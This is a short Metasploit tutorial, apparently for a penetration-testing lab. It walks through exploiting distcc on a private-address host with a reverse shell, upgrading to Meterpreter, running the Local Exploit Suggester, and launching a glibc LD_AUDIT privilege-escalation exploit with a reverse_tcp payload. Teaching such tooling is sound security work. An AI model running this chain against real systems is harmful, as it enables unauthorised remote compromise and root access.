Local Exploit Suggester

This page explains how to use the Local Exploit Suggester post module in Metasploit to find candidate local (privilege-escalation) exploits for a session you already have on a host.

Run msfconsole to start Metasploit.

> msfconsole

Search for an exploit for the target service (distcc in this example)

msf5 > search distcc

Execute the exploit

msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > options
msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.0.50
msf5 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
msf5 exploit(unix/misc/distcc_exec) > set lhost 192.168.142.141
msf5 exploit(unix/misc/distcc_exec) > run

Background the session (press Ctrl+Z in the shell and confirm)

# Ctrl+Z
Background session 1? [y/N]  y

Upgrade the session to Meterpreter

msf5 exploit(unix/misc/distcc_exec) > sessions
msf5 exploit(unix/misc/distcc_exec) > sessions -u 1 # Upgrade session 1 to Meterpreter; this creates a new session (id 2), the original shell session stays open
msf5 exploit(unix/misc/distcc_exec) > sessions
msf5 exploit(unix/misc/distcc_exec) > sessions -i 2
meterpreter > getuid
meterpreter > background

Search for local exploits (this is the most important part: the module runs the check routine of Metasploit's local exploit modules against the session's host and lists the ones that report the target as likely vulnerable; treat the list as candidates to verify, since some checks are heuristic)

msf5 exploit(unix/misc/distcc_exec) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > options
msf5 post(multi/recon/local_exploit_suggester) > set session 2 # Use the Meterpreter session (id 2), not the plain command shell (id 1)
msf5 post(multi/recon/local_exploit_suggester) > run

Run one of the suggested local exploits (the module below is one the suggester reported for this host; set session to the same Meterpreter session)

msf5 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 2
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 10.10.0.1
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 4321
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run